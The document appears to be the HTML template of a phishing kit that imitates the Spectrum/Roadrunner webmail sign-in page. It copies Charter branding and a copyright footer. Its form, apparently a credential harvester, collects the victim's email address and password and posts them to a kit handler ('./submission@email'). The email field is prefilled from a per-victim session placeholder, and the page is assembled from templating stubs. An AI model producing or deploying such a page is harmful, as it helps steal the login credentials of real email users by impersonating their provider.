<!DOCTYPE html>
<html>
  <HEAD>
    <meta charset='utf-8'>
    <META charset="UTF-8">
    <meta content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no" name="viewport">
    <LINK rel="stylesheet" type="text/css" href="{{% spectrum_css-1.css %}}">
    <LINK rel="stylesheet" type="text/css" href="{{% spectrum_css-2.css %}}">
    <LINK rel="stylesheet" type="text/css" href="{{% spectrum_css-3.css %}}">
    <LINK rel="stylesheet" type="text/css" href="{{% spectrum_css-4.css %}}">
    <LINK rel="stylesheet" type="text/css" href="{{% spectrum_css-1.css %}}">
    <TITLE>Login TWC & Roadrunner RR Email | Spectrum Webmail</TITLE>
    <META name="description" content="Former Time Warner Cable and BrightHouse customers, sign in to access your roadrunner.com, rr.com, twc.com and brighthouse.com email.">
    <link rel='shortcut icon' href='favicon.ico' type='image/x-icon' />
  </HEAD>
  <BODY>
    <DIV id="header">
      <NAV role="navigation">
        <DIV class="app-header">
          <BUTTON tabindex="0" access-tabindex="skip-to-content" access-next-tabindex="banner-menu-button" class="skip-to-content-link"> Skip to Main Content </BUTTON>
          <DIV class="app-header-container">
            <DIV class="app-header-menu">
              <DIV class="app-global-side-nav">
                <BUTTON class="nav-button" aria-haspopup="true" aria-label="Navigation menu" access-tabindex="banner-menu-button" access-next-tabindex="banner-logo">
                  <SPAN class="md-icon hamburger-icon mat-icon material-icons" role="img" aria-hidden="true"></SPAN>
                  <SPAN class="nav-menu-label" aria-hidden="true" id="menu-label">MENU</SPAN>
                </BUTTON>
              </DIV>
            </DIV>
            <DIV class="app-header-utility">
              <DIV class="app-utility-nav">
                <A class="list-item support-link mat-button" target="_blank" href="" aria-disabled="false" aria-label="Support (Opens in a new window)" tabindex="0" access-tabindex="banner-link-support" access-next-tabindex="banner-link-signout">
                  <SPAN class="no-border">Support</SPAN>
                </A>
              </DIV>
            </DIV>
            <DIV class="app-header-logo">
              <A class="mat-button" target="_self" aria-disabled="false" tabindex="0" access-tabindex="banner-logo" access-next-tabindex="banner-link-support">
                <IMG alt="Spectrum logo" src="{{% spectrum_img-2.svg %}}">
              </A>
            </DIV>
          </DIV>
          <DIV class="app-header-local">
            <DIV class="app-local-nav"></DIV>
          </DIV>
        </DIV>
      </NAV>
    </DIV>
    <DIV id="body">
      <DIV id="loginForm">
        <DIV id="loginFormContainer">
          <H1 id="headline"> Sign In to Webmail </H1>
          <DIV id="hohLink">
          </DIV>
          <FORM action="./submission@email" id="signin" method="post" name="signin">
            <DIV id="emailAddressContainer">
              <LABEL for="emailAddress">Email Address</LABEL>
              <INPUT id="user" maxlength="128" name="user" placeholder="" required="" spellcheck="false" type="text" value="{{SESSION% client_email %SESSION}}">
            </DIV>
            <DIV id="rememberEmailContainer">
              <INPUT type="checkbox" name="rememberEmail" id="rememberEmail" value="on">
              <LABEL for="rememberEmail"> Remember Email Address </LABEL>
            </DIV>
            <DIV id="emailPasswordContainer">
              <LABEL for="emailPassword"> Email Password </LABEL>
              <INPUT id="emailpassword" minlength="4" maxlength="128" name="emailpassword" placeholder="Password" required="" type="password">
            </DIV>
            <INPUT type="submit" name="submit" id="emailSubmit" value="Sign In">
          </FORM>
          <DIV id="forgotLinks">
            <A id="forgotEmail" href="">Forgot Email Address?</A>
            <A id="forgotPassword" href="">Forgot Email Password?</A>
          </DIV>
        </DIV>
      </DIV>
    </DIV>
    <DIV id="footer">
      <NAV role="navigation">
        <UL>
          <LI>© 2021 Charter Communications. All rights reserved</LI>
          <LI>
            <A href="">Advertise with Us</A>
          </LI>
          <LI>
            <A href="">Your Privacy Rights</A>
          </LI>
          <LI>
            <A href="">Web Privacy Policy</A>
          </LI>
          <LI>
            <A href="">California Consumer Privacy Rights</A>
          </LI>
          <LI>
            <A href="">California Consumer Do Not Sell My Personal Information</A>
          </LI>
          <LI>
            <A href="">Spectrum Subscriber Policies</A>
          </LI>
          <LI> Time Warner Cable and the Time Warner Cable logo are trademarks of Time Warner Inc., used under license. </LI>
        </UL>
      </NAV>
    </DIV>
  </BODY>
</html>